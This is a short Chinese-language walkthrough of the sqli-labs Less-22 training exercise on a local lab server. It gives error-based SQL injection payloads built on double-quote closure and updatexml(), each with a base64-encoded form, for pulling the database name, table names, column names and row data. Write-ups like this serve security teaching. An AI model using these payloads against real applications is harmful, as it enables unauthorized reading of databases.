前言
本题与上一题的做法相似,区别只在于闭合所用的符号不同。
前期准备
开启phpstudy,并启动Apache服务和MySQL服务
实验环节
浏览器访问Less-22
http://192.168.199.135/sqli-labs-master/Less-22/
先用双引号进行简单闭合并注释掉其后的语句,页面正常显示,说明提交的值未经处理就被拼接进了以双引号包裹的SQL字符串
Dumb" -- xz
base64编码后:RHVtYiIgLS0geHo=
判断库名
Dumb" and updatexml(1, concat(0x7e, database(), 0x7e), 1)-- xz
base64编码后:RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgZGF0YWJhc2UoKSwgMHg3ZSksIDEpLS0geHo=
判断表名
Dumb"and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz
base64编码后:RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5J2xpbWl0IDAsMSksMHg3ZSksMSktLSB4eg==
判断列名
Dumb"and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) -- xz
base64编码后:RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnIGxpbWl0IDAsMSksMHg3ZSksMSkgLS0geHo=
判断数据
Dumb"and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz
base64编码后:RHVtYiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpLS0geHo=